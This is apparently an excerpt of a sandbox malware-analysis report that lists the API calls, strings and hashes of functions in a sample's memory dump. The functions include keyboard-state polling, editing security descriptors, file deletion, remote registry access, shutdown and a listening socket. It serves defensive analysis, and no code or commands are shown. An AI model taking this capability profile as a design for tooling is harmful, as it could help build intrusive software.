Instruction ID: c676f059ef443f12d8e3236d6623d120866bb47fd1da648de7e29185c1c17ca2
Opcode Fuzzy Hash: da5c59140b3cbf6cb33f36b8efe61f6d084c676fad550b5e80dbc8285742cf81
Instruction Fuzzy Hash: D831D4326012196ACB24EBA4DC48FEF77AC9F45360F5041B7E800E31D1DB79DA49CA69

Function 00420857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00420953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0042F910,00000000,?,00000000,?,?), ref: 004209C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00420A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00420A92
RegCloseKey.ADVAPI32(?), ref: 00420DB2
RegCloseKey.ADVAPI32(00000000), ref: 00420DBF

Strings

REG_DWORD, xrefs: 00420C83
REG_MULTI_SZ, xrefs: 00420B7A
REG_BINARY, xrefs: 00420D4D
REG_EXPAND_SZ, xrefs: 00420A2F
REG_SZ, xrefs: 00420AD0
REG_QWORD, xrefs: 00420D00

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: fce52a219ae3ba9404ae2bd6b404e888eb6f4f9c5ea23a8e6c271fa90146bdc1
Instruction ID: fee5ba877e5a15f8f70137054d2cef58f790053dd19a55236544640f042b8908
Opcode Fuzzy Hash: fce52a219ae3ba9404ae2bd6b404e888eb6f4f9c5ea23a8e6c271fa90146bdc1
Instruction Fuzzy Hash: E5024A756006119FCB15EF24D845E2BB7E5EF8A314F44845EF88AAB362CB38EC45CB85

Function 003B66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

0FD, xrefs: 003B6747
BSR_UNICODE), xrefs: 003F1338
UTF16), xrefs: 003F10CF
CR), xrefs: 003F1287
ANYCRLF), xrefs: 003F12FB
NO_AUTO_POSSESS), xrefs: 003F112E
0ED, xrefs: 003B673D
UTF), xrefs: 003F10FA
pGD, xrefs: 003B6751
3c;, xrefs: 003B68FF
ANY), xrefs: 003F12DE
LIMIT_MATCH=, xrefs: 003F1170
BSR_ANYCRLF), xrefs: 003F131E
UCP), xrefs: 003F110D
0DD, xrefs: 003B6733
_;, xrefs: 003F1465, 003F150C, 003F15B4
LF), xrefs: 003F12A4
LIMIT_RECURSION=, xrefs: 003F11FC
NO_START_OPT), xrefs: 003F114F
CRLF), xrefs: 003F12C1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID: 0DD$0ED$0FD$3c;$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGD$_;
API String ID: 0-4188586584
Opcode ID: bbe487c9e0e393a6d4f2844d65a9564fed38ddb2932e6bc05eaa85058e61644c
Instruction ID: ffa65c3c81c3e23954feaa3019bff23fd636ce7f095f4ceaad583ed2842557b1
Opcode Fuzzy Hash: bbe487c9e0e393a6d4f2844d65a9564fed38ddb2932e6bc05eaa85058e61644c
Instruction Fuzzy Hash: 9572AD75E00219CBDB16CF59D8817FEB7B5FF44314F11806AEA09EB681EB349A81CB90

Function 0040F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0040F113
_wcscmp.LIBCMT ref: 0040F128
_wcscmp.LIBCMT ref: 0040F13F

Part of subcall function 00404385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004043A0

FindNextFileW.KERNEL32(00000000,?), ref: 0040F16E
FindClose.KERNEL32(00000000), ref: 0040F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0040F195
_wcscmp.LIBCMT ref: 0040F1BC
_wcscmp.LIBCMT ref: 0040F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0040F1E5
SetCurrentDirectoryW.KERNEL32(00458920), ref: 0040F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0040F20D
FindClose.KERNEL32(00000000), ref: 0040F21A
FindClose.KERNEL32(00000000), ref: 0040F22C

Strings

*.*, xrefs: 0040F190

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 42522200505519ff2fcb5aa0b4cdfed811a1ad2eae1e4a351bfdace5c93489ab
Instruction ID: 8f89f2bca01fa51fb754c1164f264b474913b35291f33de845532e9a7c6d2653
Opcode Fuzzy Hash: 42522200505519ff2fcb5aa0b4cdfed811a1ad2eae1e4a351bfdace5c93489ab
Instruction Fuzzy Hash: 4131A336600219AACB30AAA4EC49EEF776C9F45360F5441BAE800F65D1DA39DE49CA5C

Function 0040A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0040A20F
__swprintf.LIBCMT ref: 0040A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0040A293
_memset.LIBCMT ref: 0040A2B2
_wcsncpy.LIBCMT ref: 0040A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0040A323
CloseHandle.KERNEL32(00000000), ref: 0040A32E
RemoveDirectoryW.KERNEL32(?), ref: 0040A337
CloseHandle.KERNEL32(00000000), ref: 0040A341

Strings

\??\%s, xrefs: 0040A22B
:, xrefs: 0040A252
\, xrefs: 0040A247

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 02fff8268f02b3bab0a224e8079cadfae7e5d6357851fe1fe9bd300202bcdeae
Instruction ID: 4ce0b119ee0c7ac50c4423e6120b58c4c82617fc543b0d357119fe4dc03e154e
Opcode Fuzzy Hash: 02fff8268f02b3bab0a224e8079cadfae7e5d6357851fe1fe9bd300202bcdeae
Instruction Fuzzy Hash: 5531E971500209ABDB21DFA0DC49FEB77BCEF89740F5041BAF908E6290EB7496558B29

Function 003F7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003F821E
Part of subcall function 003F8202: GetLastError.KERNEL32(?,003F7CE2,?,?,?), ref: 003F8228
Part of subcall function 003F8202: GetProcessHeap.KERNEL32(00000008,?,?,003F7CE2,?,?,?), ref: 003F8237
Part of subcall function 003F8202: HeapAlloc.KERNEL32(00000000,?,003F7CE2,?,?,?), ref: 003F823E
Part of subcall function 003F8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003F8255

Part of subcall function 003F829F: GetProcessHeap.KERNEL32(00000008,003F7CF8,00000000,00000000,?,003F7CF8,?), ref: 003F82AB
Part of subcall function 003F829F: HeapAlloc.KERNEL32(00000000,?,003F7CF8,?), ref: 003F82B2
Part of subcall function 003F829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003F7CF8,?), ref: 003F82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003F7D13
_memset.LIBCMT ref: 003F7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003F7D47
GetLengthSid.ADVAPI32(?), ref: 003F7D58
GetAce.ADVAPI32(?,00000000,?), ref: 003F7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003F7DB1
GetLengthSid.ADVAPI32(?), ref: 003F7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003F7DDD
HeapAlloc.KERNEL32(00000000), ref: 003F7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 003F7E05
CopySid.ADVAPI32(00000000), ref: 003F7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003F7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003F7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 003F7E77

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 751e24140055d596a89eac3cf1c72b6f6a34a0a094fe200f292c5d42bb26cf9e
Instruction ID: b28ae4448c776b650e827169a522e1e515b83776368a65be8f1917f2391cd45f
Opcode Fuzzy Hash: 751e24140055d596a89eac3cf1c72b6f6a34a0a094fe200f292c5d42bb26cf9e
Instruction Fuzzy Hash: AE615C71A00109AFDF158FA0DC44EBEBB79FF14300F44816AF915A6291DB319E06CBA0

Function 0040001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00400097
SetKeyboardState.USER32(?), ref: 00400102
GetAsyncKeyState.USER32(000000A0), ref: 00400122
GetKeyState.USER32(000000A0), ref: 00400139
GetAsyncKeyState.USER32(000000A1), ref: 00400168
GetKeyState.USER32(000000A1), ref: 00400179
GetAsyncKeyState.USER32(00000011), ref: 004001A5
GetKeyState.USER32(00000011), ref: 004001B3
GetAsyncKeyState.USER32(00000012), ref: 004001DC
GetKeyState.USER32(00000012), ref: 004001EA
GetAsyncKeyState.USER32(0000005B), ref: 00400213
GetKeyState.USER32(0000005B), ref: 00400221

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8c033f68488615399ae9885da8f252c0f71d503d2008a3f01341422f8500f21a
Instruction ID: be21dd1c1014d19f1dc734f8f10c6381c9f277c68af0183fbdf2efc6bc5ac95c
Opcode Fuzzy Hash: 8c033f68488615399ae9885da8f252c0f71d503d2008a3f01341422f8500f21a
Instruction Fuzzy Hash: B051AC3090478829FB35D7A098547EBBFB45F02380F4845BF99C56A6C2DABC9B8CC759

Function 004203DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00420E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0041FDAD,?,?), ref: 00420E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004204AC

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0042054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004205E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00420822
RegCloseKey.ADVAPI32(00000000), ref: 0042082F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 4c1b2ed57fbbff7c1bd9e75a1f00a9677481919c3f597f4ef6d62f796d40d610
Instruction ID: 363f2b8c6041633381ca9fbae4a9d1f06e7d8c76003676fe0c0bac318b11b430
Opcode Fuzzy Hash: 4c1b2ed57fbbff7c1bd9e75a1f00a9677481919c3f597f4ef6d62f796d40d610
Instruction Fuzzy Hash: 4AE17F30604214AFCB15DF24D885E2BBBE8EF89314F44856EF44ADB262DB34ED05CB96

Function 00414164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0041418B
EmptyClipboard.USER32 ref: 00414191
GlobalAlloc.KERNEL32(00000002,?), ref: 004141A6
CloseClipboard.USER32 ref: 00414245

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7a79f8b7ff00c57acb48ac435d81018c53416129b563632fda6d561445cb671a
Instruction ID: c4826eec032005fefdc3684c4476f4b748885045cbfe4e7f3df67d33ef8bc7ae
Opcode Fuzzy Hash: 7a79f8b7ff00c57acb48ac435d81018c53416129b563632fda6d561445cb671a
Instruction Fuzzy Hash: CF219135300210AFDB11AF64DC0DB6A7BB8EF45750F54807AF946DB261DB78AC42CB59

Function 004037EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003A4743,?,?,003A37AE,?), ref: 003A4770

Part of subcall function 00404A31: GetFileAttributesW.KERNEL32(?,0040370B), ref: 00404A32

FindFirstFileW.KERNEL32(?,?), ref: 004038A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0040394B
MoveFileW.KERNEL32(?,?), ref: 0040395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0040397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0040399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 004039B9

Strings

\*.*, xrefs: 0040384E, 00403857, 0040386C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: d63697c9489448d8bd1a25792a7560cedf8b514fa041eb04f1e678565a9680e8
Instruction ID: 1f34a730507b4531db57ef4fdc49b6ff878697d42127e949dfcef9d6ba3c616e
Opcode Fuzzy Hash: d63697c9489448d8bd1a25792a7560cedf8b514fa041eb04f1e678565a9680e8
Instruction Fuzzy Hash: 3151817180514C9ACF16EFA0CD929EEBB79AF15301F6040BAE401BB1D2DB356F09CB65

Function 0040F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0040F440
Sleep.KERNEL32(0000000A), ref: 0040F470
_wcscmp.LIBCMT ref: 0040F484
_wcscmp.LIBCMT ref: 0040F49F
FindNextFileW.KERNEL32(?,?), ref: 0040F53D
FindClose.KERNEL32(00000000), ref: 0040F553

Strings

*.*, xrefs: 0040F425

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 0d4e1d317cefc14c9651ea68a8c7261ba60517b1b8b05ae867e39665b5072e55
Instruction ID: 57b19f813733d2a571e44a771dcea0e38c177abd6ae9958154b10b9d6136a1bd
Opcode Fuzzy Hash: 0d4e1d317cefc14c9651ea68a8c7261ba60517b1b8b05ae867e39665b5072e55
Instruction Fuzzy Hash: 6B416D71900219ABCF21EF64DC45AEFBBB4FF05310F50447AE815A6292DB34AE49CB54

Function 003B3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_;, xrefs: 003B3322
3c;, xrefs: 003B3225

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c;$_;
API String ID: 674341424-934490711
Opcode ID: 97d608d24aa5da5488c307b3898eed313f914c3752ed883c4ef29251f3a9e2ac
Instruction ID: 912119a581c03911e38b46308f01964bc2caced65603f41c5f2f7d9782f49789
Opcode Fuzzy Hash: 97d608d24aa5da5488c307b3898eed313f914c3752ed883c4ef29251f3a9e2ac
Instruction Fuzzy Hash: 8122BD716083509FC726DF15C881BAFB7E8EF85304F10492DF99A9B691DB71E904CB92

Function 003B5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003B58A5
_memmove.LIBCMT ref: 003B58F5
_memmove.LIBCMT ref: 003B595B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 09d431eb82b362a47f3efa56f43b22cd2648f50f32a3f218197efe3f4ecd2644
Instruction ID: 7297ca25709a90ddc0312a40f231af6d913bbae6d3c4e5af14f80add9f4b1eb8
Opcode Fuzzy Hash: 09d431eb82b362a47f3efa56f43b22cd2648f50f32a3f218197efe3f4ecd2644
Instruction Fuzzy Hash: C8128970A00609EBDF0ADFA9D981AEEB7B5FF48304F104529E906EB651EB35AD14CB50

Function 00403B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003A4743,?,?,003A37AE,?), ref: 003A4770

Part of subcall function 00404A31: GetFileAttributesW.KERNEL32(?,0040370B), ref: 00404A32

FindFirstFileW.KERNEL32(?,?), ref: 00403B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00403BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00403BEA
FindClose.KERNEL32(00000000), ref: 00403C01
FindClose.KERNEL32(00000000), ref: 00403C0A

Strings

\*.*, xrefs: 00403B5B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4062869fec78c648d71da7ff6f6765c5a165176ca07009381f7c7be7d77d9eed
Instruction ID: 71dce155a9d096e49b2eb9d2ff7a898de90dfdbbc8290ddfbc75b93542a59b2f
Opcode Fuzzy Hash: 4062869fec78c648d71da7ff6f6765c5a165176ca07009381f7c7be7d77d9eed
Instruction Fuzzy Hash: DD3161310083859BC316EF64C8919AFBBACAE92315F804D3EF4D596192EB359A0DC767

Function 004051BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 003F87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003F882B
Part of subcall function 003F87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003F8858
Part of subcall function 003F87E1: GetLastError.KERNEL32 ref: 003F8865

ExitWindowsEx.USER32(?,00000000), ref: 004051F9

Strings

, xrefs: 004051E7
SeShutdownPrivilege, xrefs: 004051C9
@, xrefs: 004051EC

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: b578f0231ef1e68958c14b5bd0909a1d021e5889a4f38607e80d0ce3e3534000
Instruction ID: dec3d4c991efd788e4e9060f7f2f82ace744a4c327d9746e6e52aa4e4a9ebca6
Opcode Fuzzy Hash: b578f0231ef1e68958c14b5bd0909a1d021e5889a4f38607e80d0ce3e3534000
Instruction Fuzzy Hash: EF014735791611ABE7382268AC8AFBB7268DF05340F6008BBF903F61D2D9791C028D9D

Function 00416283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 004162DC
WSAGetLastError.WSOCK32(00000000), ref: 004162EB
bind.WSOCK32(00000000,?,00000010), ref: 00416307
listen.WSOCK32(00000000,00000005), ref: 00416316
WSAGetLastError.WSOCK32(00000000), ref: 00416330
closesocket.WSOCK32(00000000), ref: 00416344

Memory Dump Source

